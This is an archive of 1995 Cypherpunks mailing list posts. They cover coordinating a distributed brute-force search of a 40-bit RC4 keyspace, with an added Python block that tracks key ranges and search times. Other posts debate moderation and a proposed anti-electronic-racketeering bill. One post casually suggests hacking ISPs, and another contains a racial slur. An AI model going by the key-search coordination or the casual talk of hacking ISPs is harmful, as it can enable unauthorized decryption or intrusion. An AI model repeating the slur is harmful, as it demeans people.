Message-ID: <199507130932.DAA18813@zeezrom.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have begun searching the unwanted 31 bit keyspace cd70000000 to cdefffffff
and according to my calculations will be able to search two blocks of
31 bits a night until I get bored of starting the searches.

I will be running 8+ hp9000/715s at 27,200 keys/second each.

If someone was planning on searching this keyspace, let's decide on it.

Thanks to those who helped me get going.


Don
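
The block notation from the "UNWANTED KEYSPACE" post and the claim made in this one, worked through as an added example (not code from either poster or from the key-search project). It assumes "cd70000000 31" means 2^31 consecutive keys starting at that value, which matches the range cd70000000 to cdefffffff quoted above, and it takes 8 machines at 27,200 keys/second from this post; the second claimant is constructed.

```python
"""Bookkeeping for key-space blocks written as 'start_hex bits', as in the thread."""
from dataclasses import dataclass

KEY_BITS = 40  # the thread concerns a 40-bit RC4 key


@dataclass(frozen=True)
class Block:
    start: int  # first key in the block
    bits: int   # the block holds 2**bits consecutive keys

    @property
    def size(self) -> int:
        return 1 << self.bits

    @property
    def end(self) -> int:
        return self.start + self.size - 1  # inclusive


def parse_block(line: str) -> Block:
    start_hex, bits_txt = line.split()
    block = Block(int(start_hex, 16), int(bits_txt))
    if not 0 <= block.bits <= KEY_BITS or block.end >= 1 << KEY_BITS:
        raise ValueError(f"block outside the {KEY_BITS}-bit key space: {line!r}")
    return block


def find_overlaps(claims):
    """claims: list of (owner, Block). Return (owner_a, owner_b, first, last) clashes."""
    ordered = sorted(claims, key=lambda c: c[1].start)
    clashes = []
    for i, (owner_a, a) in enumerate(ordered):
        for owner_b, b in ordered[i + 1:]:
            if b.start > a.end:
                break  # sorted by start: no later block can touch a
            clashes.append((owner_a, owner_b, b.start, min(a.end, b.end)))
    return clashes


def coalesce(blocks):
    """Merge touching or overlapping blocks into inclusive (first, last) ranges."""
    ranges = []
    for b in sorted(blocks, key=lambda blk: blk.start):
        if ranges and b.start <= ranges[-1][1] + 1:
            ranges[-1] = (ranges[-1][0], max(ranges[-1][1], b.end))
        else:
            ranges.append((b.start, b.end))
    return ranges


def search_seconds(n_keys: int, machines: int, keys_per_second_each: int) -> float:
    """Time to try n_keys keys, assuming the machines split the work evenly."""
    return n_keys / (machines * keys_per_second_each)


# First three lines of the list posted in "UNWANTED KEYSPACE".
RETURNED = ["cd70000000 31", "cdf0000000 31", "ce70000000 31"]

if __name__ == "__main__":
    blocks = [parse_block(line) for line in RETURNED]
    for b in blocks:
        print(f"{b.start:010x} .. {b.end:010x}  ({b.size} keys)")

    # The three blocks are back to back, so they merge into one range.
    for first, last in coalesce(blocks):
        print(f"contiguous: {first:010x} .. {last:010x}")

    # A constructed second claim that lands inside the block claimed in this post.
    claims = [("don", blocks[0]), ("volunteer-b", parse_block("cdb0000000 30"))]
    for a, b, first, last in find_overlaps(claims):
        print(f"double claim by {a} and {b}: {first:010x} .. {last:010x}")

    per_block = search_seconds(1 << 31, 8, 27200)
    whole = search_seconds(1 << KEY_BITS, 8, 27200)
    print(f"one 31-bit block: {per_block / 3600:.2f} hours")
    print(f"entire 40-bit space on the same machines: {whole / 86400:.1f} days")
```

At these rates two 31-bit blocks take about five and a half hours, and the whole 40-bit space would take the same eight machines roughly two months.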



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stu@nemesis (Stuart Smith)
Date: Thu, 13 Jul 95 08:52:28 PDT
To: mjg51721@uxa.cso.uiuc.edu
Subject: Re: A more sophisticated form of moderation.
In-Reply-To: <199507111845.AA16926@uxa.cso.uiuc.edu>
Message-ID: <m0sWLbm-0007HvC@nemesis>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507111845.AA16926@uxa.cso.uiuc.edu> you write:
>Specifically, I was thinking along the lines of a newsgroup where only
>selected individuals are able to post, but anybody who wants to can read
>the group.  However, the "selected individuals" could fall into several
>categories.
<snip>

I think this is the wrong direction to go - I mean certainly, if a given
newsgroup or mailing list wants to have a secret decoder ring that one needs
to be in possession of to be allowed to post, they're more than welcome -
but viewer/reader/receiver level filtering is the way to go.  Most
newsreaders have kill files, a newsreader called strn (Scoring Threaded Read
News) takes it a step further.

In strn you have "score files" for hierarchies, groups, or certain topics,
and within these files you specify rules by which each article is given a
score.  You can then have all the articles below a certain score auto-killed
or you can just be presented with a list of articles, sorted highest score
to lowest.  This lets you not only select who you *don't* want to read, as
a killfile does, but it also lets you choose who you *do* want to read, even
though every idiot can post.  This gets around the messy censorship
questions.

I use a program that takes a mailing list and posts it to a local newsgroup,
so I can read cypherpunks like I read news.  I tried to select the more
intelligent posters by giving them high scores, but I found it became rather
pointless, as most of the posters (with a few notable exceptions) are
worthwhile reading.  It is still useful for subject filtering however.

In any case, the concepts implemented in strn could easily be expanded and
coded into other popular newsreaders and mail agents.  I think this is a
much better solution.

Just a quick add-on thought - this whole discussion started from people
talking about moderation - the above is my answer to those who say we (or
any group) *needs* moderation.  If any group nonetheless *chooses* to
moderate, I have no quibble, but it cannot be said that it is necessary to
extract signal from noise.  I enjoy several moderated newsgroups and
mailing lists, and wouldn't give them up for the world, but it's not for
everyone.  I think this is a good example of reputations at work, in good
cypherpunk form.  I read moderated groups and lists where the moderator in
question has shown good form and judgement and thus has a good reputation -
I would avoid groups moderated by those who demonstrate otherwise.

It was pointed out that there is a moderated cypherpunks list (I don't know
anything about it - I'm assuming it's someone who gets the list and forwards
some part of it, the signal, to the smaller "moderated" list).  This is a
really good example of moderation in that the unmoderated raw feed is still
available.  Imagine if there were two groups, rec.arts.erotica and
rec.arts.erotica.moderated or somesuch, the latter being a subset of the
former.  That way everybody gets to have their cake and eat it too.

- --
 Baba baby mama shaggy papa baba bro baba rock a shaggy baba sister
shag saggy hey doc baba baby shaggy hey baba can you dig it baba baba
E7 E3 90 7E 16 2E F3 45  *   Stuart Smith  *  28 24 2E C6 03 02 37 5C 
     <stu@nemesis.wimsey.com>  *  http://www.wimsey.com/~ssmith/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAT21ai5iP4JtEWBAQEx1wP7BthRjlkOveACG8lbAPDu9b52PznTdEh7
TYLyZGR9/HqQc3ExLMb0051Lo3LaSbh4T7BM6/ZHNOeLZpi4lVqzu7fJCK2dA33Q
a2emExbanU/YPnIdiuZZ/bOcWhUbmdDRJ0TttNja1jLpmokQ6RpYs3P2ke+jfi19
rjCwQYhc4oM=
=hxjj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 13 Jul 95 16:21:19 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
Message-ID: <v02120d20ac2abc80bcca@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>At 10:41 AM 7/13/95, Douglas Barnes wrote:
>
>>Since the Anti-Electronic Racketeering Act of 1995 might as well
>>be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
>>Tim throw in the towel already, when the bill hasn't even made it
>>through committee yet.
>
>I'd hardly call my view "throwing in the towel." What I said clearly enough
>was that the Washingtonians can throw out repressive legislation much
>faster than we can--and I speak in terms of "we" as being the EFF, EPIC,
>NRA, ACLU, etc., and _not_ the Cypherpunks, who have no lobbying activities
>to speak of.
>

I'm not advocating that cypherpunks lobby -- we clearly don't have the
organization or the right image to be doing that. I _do_ think that it's
important to support the EFF, EPIC and ACLU who will almost certainly
be fighting this very important rearguard action while we try to get
_our_ act together. I'm not sure the NRA bears on this exact matter,
but I think it's high time one of the other three started doing "jack
booted thug"-type fundraising letters.

This means, for those not reading between the lines, doing something
more than online ranting and petition-signing, such as getting out the
checkbook and supporting those who are organized to fight these things,
and actually getting off the dime and doing things like writing letters,
sending telegrams, and otherwise harassing our elected beings through
media that they understand (since, clearly, they _don't_ understand
the Internet -- if they did, they wouldn't propose legislation like this.)

Yes, the "bad guys" can crank out unfriendly legislation faster than
the "good guys" can fight it, but since we are clearly not ready to offer
technological solutions this month, the "good guys" act as a valuable
brake on this current swing of the pendulum.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jmm0021@alamo.net (Jason Montgomery)
Date: Thu, 13 Jul 95 06:09:07 PDT
To: cypherpunks@toad.com
Subject: There is a God
Message-ID: <2yc78c1w165w@alamo.net>
MIME-Version: 1.0
Content-Type: text/plain


On ABC's latenight news program I just saw a story that renewed my faith 
that there is a God and he is brown.  It seems that the Alabama Milita 
was able to film a ATF event that was truly horrifing to behold.  Nigger 
Hunging Licenses and the works.  Well our friends in Alabama gave the 
tapes to ABC and the story was blown wide open.  Our friends from Alabama 
in the pursuit of the ATF did the world a great service and completely 
restored my faith in America.

Jason Montgomery

ps.  The spelling errors are all mine its 6 in the morning and im out of 
caffine.

----------------------------------------------------------------
Jason Montgomery                            
jmm0021@alamo.net                           
----------------------------------------------------------------
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Thu, 13 Jul 95 03:24:31 PDT
To: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Subject: Re: Don't trust the net too much  (or at all)
In-Reply-To: <Pine.3.89.9507102051.G1184-0100000@khijol>
Message-ID: <9507131022.AA09335@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net> writes:

|The POPs communicate with Netcom in San Jose.  As I understand it, Netcom
|isn't a true distributed computing environment - all the server machines
|are in San Jose.  Take out the servers, you take out the ISP.

There's no need to use bombs, guns, any of that nastiness.
As someone pointed to here already, it's far easier and
safer to use technical means.

Unfortunately for far too many ISPs, saying security is like
speaking words in an alien tongue. They just don't get it,
and even if they do, they don't want to spend the money on
it, or worse yet, (and more commonly lately) allocate some
poor sod who becomes the overnight expert on it, which is worse
than admitting that it's not a high priority.

Basically, it amounts to hack 'em and drop 'em.

What is to prevent the [hostiles] from trying to develop
code to secretly monitor machines at ISPs and other
places? And then just take them out whenever they want...
Nothing I believe.

Except perhaps the security offered by decent & available
encryption.


Tim Scanlon



________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM
Date: Thu, 13 Jul 95 06:30:01 PDT
To: cypherpunks@toad.com
Subject: Re:  Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <9507131331.AA00800@homeboy.local>
MIME-Version: 1.0
Content-Type: text/plain


>      "(2) to distribute computer software that encodes or encrypts
>    electronic or digital communications to computer networks that the
>    person distributing knows, or reasonably should know, is accessible to
>    foreign nationals and foreign governments, regardless of whether such
>    software has been designated nonexportable."

It would be kind of nice if we could get some first amendment protection
for electronic media speech.

Next thing you know they will want to extend RICO to librarians.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Thu, 13 Jul 95 03:34:24 PDT
To: cypherpunks@toad.com
Subject: Re: Speedup of bruterc4.c
In-Reply-To: <Pine.SOL.3.91.950711094531.24661C-100000@eagle.nexor.co.uk>
Message-ID: <9507131033.AA09374@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone parallelized this code? I'm interested in running it
on a Paragon. Email me if you have or if you think this is worth
bothering with.

Tim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM
Date: Thu, 13 Jul 95 06:39:32 PDT
To: bdolan@use.usit.net
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <9507131341.AA00807@homeboy.local>
MIME-Version: 1.0
Content-Type: text/plain


Even scarier is the Storm Trooper Exception (ala Steve Jackson):

            (j) Privacy Protection Act: Section 101 of the Privacy Protection
          Act of 1980 (42 U.S.C. 2000aa) is amended--
                (1) in subsection (a)--
                    (A) by striking `or' at the end of paragraph (1);
                    (B) by striking the period at the end of paragraph (2) 
                  and inserting `; or'; and
                    (C) by adding at the end the following new paragraph:
                `(3) there is reason to believe that the immediate seizure of
              such materials is necessary to prevent the destruction or
              altercation of such documents.'; and
                (2) in subsection (b)--
                    (A) by striking `or' at the end of paragraph (3);
                    (B) by striking the period at the end of paragraph (4) 
                  and inserting `; or'; and
                    (C) by adding at the end the following new paragraph:
                `(5) in the case of electronically stored data, the seizure 
              is incidental to an otherwise valid seizure, and the government
              officer or employee--
                    `(A) was not aware that work product material was among
                  the data seized;
                    `(B) upon actual discovery of the existence of work
                  product materials, the government officer or employee took
                  reasonable steps to protect the privacy interests 
                  recognized by this section, including--
                        `(i) using utility software to seek and identify
                      electronically stored data that may be commingled or
                      combined with non-work product material; and
                        `(ii) upon actual identification of such material,
                      taking reasonable steps to protect the privacy of the
                      material, including seeking a search warrant.'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Thu, 13 Jul 95 03:50:05 PDT
To: alt@iquest.net (Al Thompson)
Subject: Re: RACIST MILITIA: ATF
In-Reply-To: <m0sVs4F-000BYfC@dorite1.iquest.net>
Message-ID: <9507131048.AA09393@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I can confirm this, and a story was broadcast on the local
ABC news affiliate (WJLA) that talked about this and Waco
some. Congressional hearings by the Senate have been scheduled
as a result. I saw videotape of the signs referenced in the
article posted to the list. I did not see T-Shirts, but I
did see a whole lot of 'confederate flags' as well as a lot
of serious drinking and hell raising by burly dudes who
looked like they'd be more comfortable in body armor.


Tim Scanlon

________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 13 Jul 95 03:59:25 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SOL.3.91.950712171632.1850A-100000@use.usit.net>
Message-ID: <9507131059.AA20485@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"If you read one thread this year, read this one"

One way to find the following text is to look up S.974 on Thomas,
http://thomas.loc.gov/, and follow the "references to this bill in the
Congressional Record" link. Here's the URL I used, but I suspect this query
won't work from scratch: 
http://rs9.loc.gov/cgi-bin/query/2?r104:./temp/~r10443Io:e50455:+@1(S.+974)++

Deep down, I didn't truly believe it would come to this. Now I'm a believer.
I've inserted a few comments. If they seem alarmist, perhaps it's because
I'm alarmed !  I actually find Grassley's comments more frightening than the
text of the bill itself....

I get the impression that this amendment might also jeopardize anonymous
digital cash; Sec. 1030 (a) (3) makes it unlawful to "use a computer or
computer network to transmit a communication intended to conceal or hide the
origin of money or other assets, tangible or intangible, that were derived
from racketeering activity."  All these limitations on cryptography and
privacy seem to shift the effective burden of proof from the prosecution to
the defense -- Jennifer Q. Public can't keep anything out of the prosecution's
eyes, in case she might be laundering Mafia dough. 

If they're pursuing a similar argument with this amendment, anonymous
remailing may be in trouble too. 

 --- Begin Included Text ---

STATEMENTS ON INTRODUCED BILLS AND JOINT RESOLUTIONS (Senate - June
27, 1995) 
Sen. GRASSLEY

Mr. GRASSLEY. Mr. President, I rise this evening to introduce the
Anti-electronic Racketeering Act of 1995. This bill makes important changes
to RICO and criminalizes deliberately using computer technology to engage in
criminal activity. I believe this bill is a reasonable, measured and strong
response to a growing problem. According to the computer emergency and
response team at Carnegie-Mellon University, during 1994, about 40,000
computer users were attacked. Virus hacker, the FBI's national computer
crime squad has investigated over 200 cases since 1991. So, computer crime is
clearly on the rise.

Mr. President, I suppose that some of this is just natural. Whenever man
develops a new technology, that technology will be abused by some. And that
is why I have introduced this bill. 

<< to make sure nobody can use it, lest they "abuse" it...

I believe we need to seriously reconsider
the Federal Criminal Code with an eye toward modernizing existing statutes
and creating new ones. In other words, Mr. President, Elliot Ness needs to
meet the Internet.

Mr. President, I sit on the Board of the Office of Technology Assessment.
That Office has clearly indicated that organized crime has entered cyberspace
in a big way. International drug cartels use computers to launder drug money
and terrorists like the Oklahoma City bombers use computers to conspire to
commit crimes.

<< I haven't heard much to suggest that McVeigh was using a
<< computer for anything, but we all saw this line coming, right ?
<< 3 of Tim's 4 Horsemen of the Infocalypse figure prominently here; I guess
<< Exon & Gorton have ridden off after the fourth already....

Computer fraud accounts for the loss of millions of dollars per year. And
often times, there is little that can be done about this because the computer
used to commit the crimes is located overseas. So, under my bill, overseas
computer users who employ their computers to commit fraud in the United
States would be fully subject to the Federal criminal laws. 

<< So the U.S. Government now considers, among other things, the entire
<< Internet to fall under its jurisdiction. I think he's referring to 
<< Sec. 1030 A (g). The provisions of that subsection apply to the entire
<< enclosing section, which under this amendment would include the
<< prohibition on non-GAK crypto on the net.

Also under my
bill, Mr. President, the wire fraud statute which has been successfully used by
prosecutors for many users, will be amended to make fraudulent schemes
which use computers a crime.

It is not enough to simply modernize the Criminal Code. We also
have to reconsider many of the difficult procedural burdens that prosecutors
must overcome. For instance, in the typical case, prosecutors must identify a
location in order to get a wiretapping order. But in cyberspace, it is often
impossible to determine the location. And so my bill corrects that so that if
prosecutors cannot, with the exercise of effort, give the court a location, then
those prosecutors can still get a wiretapping order. 

<< I'm not sure where in the bill this is delineated. Would the police be
<< given a carte blanche to root around wherever the mood strikes them ?

And for law
enforcers--both State and Federal--who have seized a computer which
contains both contraband or evidence and purely private material, I have
created a good-faith standard so that law enforcers are not shackled by
undue restrictions but will also be punished for bad faith.

<< All together now: "TRUST US"

Mr. President, this brave new world of electronic communications and global
computer networks holds much promise. But like almost anything, there is the
potential for abuse and harm. That is why I urge my colleagues to support
this bill and that is why I urge industry to support this bill.

On a final note, I would say that we should not be too scared of
technology. 

<< Did a staffer write this ?

After all, we are still just people and right is still right and
wrong is still wrong. Some things change and some things do not. 

<< Did George Bush write this ?

All that
my bill does is say you can't use computers to steal, to threaten others or
conceal criminal conduct.

<< Ah, if that's all it does, why not scrap the whole thing and not waste
<< the Senate's valuable time ?  After all, stealing, threatening, and
<< concealing criminal conduct are already outlawed....

Mr. President, I ask unanimous consent that the text of the bill be printed
in the Record.

There being no objection, the bill was ordered to be printed in the Record,
as follows:
[...]

 --- End Included Text ---

<< -Lewis "Futplex" McCarthy <lmccarth@cs.umass.edu>
<< I am not a lawyer

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAT8VGf7YYibNzjpAQEuWwQAx4dzd38Cj/2nwR/gDd89TmztX6KlG/cM
Aq7veVSH6aEw/8OcHvaiROhIcDww5xJwGFcQXFil1v5sJvg7667e93ybhIiv0Hw1
0/XRvwh0K1pG3GkozISJLPSeuz8EHlZukpV8fv3iZxuSdbIMGJYQT0WmvB736RuW
yF9b047mX4E=
=G4jp
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 13 Jul 95 05:12:07 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507122221.AA24506@toad.com>
Message-ID: <9507131212.AA21613@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


bal writes:
> It's much worse than this.  Look at the definition of "predicate act":
> 
>             `(b) For purposes of this section, each act of distributing
>           software is considered a separate predicate act. Each instance in
>           which nonexportable software is accessed by a foreign government, 
>           an agent of a foreign government, a foreign national, or an agent 
>           of a foreign national, shall be considered as a separate predicate
>           act.
> 
> Now, since the bill also makes 1030A violations "racketeering
> activities", all you need are two predicate acts and RICO comes into
> play.  

In the subsection that explicitly mentions crypto, it says that it's
unlawful to put (non-GAK) crypto on an open net, "regardless of whether such
software has been designated non-exportable". If the phrase "nonexportable"
means the same thing in the context of this subsection, then provision (b)
would only seem to apply RICO to stuff that already falls under ITAR.

For whatever it covers, this provision conveniently makes you liable for the
actions of others. I could see quid pro quo between governments coming into
play here. They can get practically anyone connected with a foreign country 
to click a button on a Web browser, download PGP half a dozen times, and then
hit you with 7 counts of racketeering. Hey, they could run a net searcher
daemon that automatically snags a heap of copies of anything it finds that
looks like a non-GAK crypto app.  

[...]
> Get a copy of this bill from:
> 
> 		ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP
> 
> and read it.  
> 
> 					--bal

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 13 Jul 95 05:52:52 PDT
To: cypherpunks@toad.com
Subject: LOU_nex
Message-ID: <199507131252.IAA01827@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-13-95. NYPaper Page Oner:


   "Senior F.B.I. Agent Suspended in Probe Of a Deadly Siege."

      The Federal Bureau of Investigation has suspended a
      senior career agent as a result of a Justice Department
      inquiry into whether officials destroyed important
      documents about the agency's bloody 1992 standoff with
      a white separatist in Idaho, law-enforcement officials
      said today. The suspension of the agent, E. Michael
      Kahoe, who was an official at F.B.I. headquarters during
      the Idaho siege, sent a shock wave through the agency's
      upper ranks.                                   LOU_nex











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 13 Jul 95 05:58:34 PDT
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Re: LOU_nex
In-Reply-To: <199507131252.IAA01827@pipe3.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.950713085642.25760A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, John Young wrote:

> Date: Thu, 13 Jul 1995 08:52:50 -0400
> From: John Young <jya@pipeline.com>
> To: cypherpunks@toad.com
> Subject: LOU_nex 
> 
>    7-13-95. NYPaper Page Oner:
> 
> 
>    "Senior F.B.I. Agent Suspended in Probe Of a Deadly Siege."
> 
>       The Federal Bureau of Investigation has suspended a
>       senior career agent as a result of a Justice Department
>       inquiry into whether officials destroyed important
>       documents about the agency's bloody 1992 standoff with
>       a white separatist in Idaho, law-enforcement officials
>       said today. The suspension of the agent, E. Michael
>       Kahoe, who was an official at F.B.I. headquarters during
>       the Idaho siege, sent a shock wave through the agency's
>       upper ranks.

Lemme guess, suspended to the Bahamas while the promotion committee meets.

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 13 Jul 95 01:31:32 PDT
To: cypherpunks@toad.com
Subject: Re: general RC4 key searcher: optimisations anyone?
In-Reply-To: <9507121753.AA08575@vail.tivoli.com>
Message-ID: <Pine.SOL.3.91.950713092431.1552C-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Mike McNally wrote:

> Jonathan Shekter writes:
>  > >After all, the kind of really high powered systems that can make a
>  > >large dent in the key space are not running Windows NT.
>  > 
>  > 	Umm... ever hear of an Alpha?

When I stuck that comment in I had in mind the message that appeared here 
in the list from someone at maspar.com, where their machines make our 
workstations look rather pedestrian.  Agreed, though, Alphas are nice 
(I'm typing this message on one).

> Also, I've been quite impressed with the Pentium times.  It must have
> something to do with the "friendliness" towards byte operations in the
> Intel architecture.

The Pentium's integer performance in general is very good, right up there 
with the more expensive Sparc according to the figures I saw in one of 
the linux newsgroups a while back.  Unfortunately the same cannot be said 
for the relative performance of its FPU, Intel needs to do a lot of work 
there to catch up.


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mclow@coyote.csusm.edu (Marshall Clow)
Date: Thu, 13 Jul 95 09:43:23 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <ac2afc0c00021003cf47@[144.37.6.21]>
MIME-Version: 1.0
Content-Type: text/plain


No one seems to have pointed this out, so:
(maybe it's obvious to everyone else)

>    "Sec. 1030A.  Racketeering-related crimes involving computers
>      "(a) It shall be unlawful--
>
>   . . .
>
>         "(2) to distribute computer software that encodes or encrypts
>       electronic or digital communications to computer networks that the
>       person distributing knows, or reasonably should know, is accessible to
>       foreign nationals and foreign governments, regardless of whether such
>       software has been designated nonexportable."
>
    IANAL, but it seems to me that if I EMAIL a copy of PGP to, say, Tim
May, that I have just "distributed computer software .... to a computer
network ...accessible to foreign nationals ..." even though it was
"private" e-mail.

   Comments, anyone?   Anyone? Bueller? ;-)


>Get a copy of this bill from:
>                ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP
>and read it.
>
   Betcher ass.

-- Marshall
"The constitution. It's not perfect, but it's a damn sight better than what
we've got."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Billson <bob@kc2wz.bubble.org>
Date: Thu, 13 Jul 95 07:42:09 PDT
To: cypherpunks@toad.com
Subject: Re: LOU_nex
Message-ID: <9507131009.AA11503@kc2wz.bubble.org>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <access.digex.net!unicorn> wrote:
>>       Kahoe, who was an official at F.B.I. headquarters during
>>       the Idaho siege, sent a shock wave through the agency's
>>       upper ranks.
>
>Lemme guess, suspended to the Bahamas while the promotion committee meets.

...soon to be followed with retirement at full government pension.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 13 Jul 95 07:13:42 PDT
To: bal@martigny.ai.mit.edu
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507131412.KAA07969@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:20 PM 7/12/95 -0400, Brian A. LaMacchia wrote:
>Finally, we begin to see the attack on all forms of un-escrowed
>encryption.  The bill provides an affirmable defense of
>giving the keys to the government ahead of time!
>
>            `(c) It shall be an affirmative defense to prosecution under this
>          section that the software at issue used a universal decoding device
>          or program that was provided to the Department of Justice prior to
>          the distribution.'.

We'll just supply the feds with some of the key testing code developed for
collective cracking of RSA-129 or RC4.  That code is "a universal decoding
device or program."  All it takes is a few years... <g>

DCF

"Since the Occupational Safety and Health Administration started
'protecting' us, there has been no significant decline in work place
injuries."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 13 Jul 95 07:18:45 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <199507131412.KAA07969@panix.com>
Message-ID: <Pine.SUN.3.91.950713101705.366A-100000@access1.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Duncan Frissell wrote:

> Date: Thu, 13 Jul 1995 10:12:51 -0400
> From: Duncan Frissell <frissell@panix.com>
> To: bal@martigny.ai.mit.edu
> Cc: cypherpunks@toad.com
> Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
> 
> At 06:20 PM 7/12/95 -0400, Brian A. LaMacchia wrote:
> >Finally, we begin to see the attack on all forms of un-escrowed
> >encryption.  The bill provides an affirmable defense of
> >giving the keys to the government ahead of time!
> >
> >            `(c) It shall be an affirmative defense to prosecution under this
> >          section that the software at issue used a universal decoding device
> >          or program that was provided to the Department of Justice prior to
> >          the distribution.'.
> 
> We'll just supply the feds with some of the key testing code developed for
> collective cracking of RSA-129 or RC4.  That code is "a universal decoding
> device or program."  All it takes is a few years... <g>

We need stealth encryption.

PERIOD.


> 
> DCF
> 
> "Since the Occupational Safety and Health Administration started
> 'protecting' us, there has been no significant decline in work place 
> injuries."


00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 13 Jul 95 10:17:24 PDT
To: cypherpunks@toad.com
Subject: Re: CRYPTO: Anti-Electronic Racketeering Act of 1995
Message-ID: <199507131715.KAA17445@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>		ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP

Sigh.  The EFF moves out of Washington for _15_minutes_ and what happens?  :-)
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 13 Jul 95 10:18:55 PDT
To: cypherpunks@toad.com
Subject: VENONA web page
Message-ID: <199507131718.KAA24249@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Check out http://www.fas.org/pub/gen/fas/irp/venona/

	Jim Gillogly
	Highday, 20 Afterlithe S.R. 1995, 17:18




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mclow@coyote.csusm.edu (Marshall Clow)
Date: Thu, 13 Jul 95 10:25:40 PDT
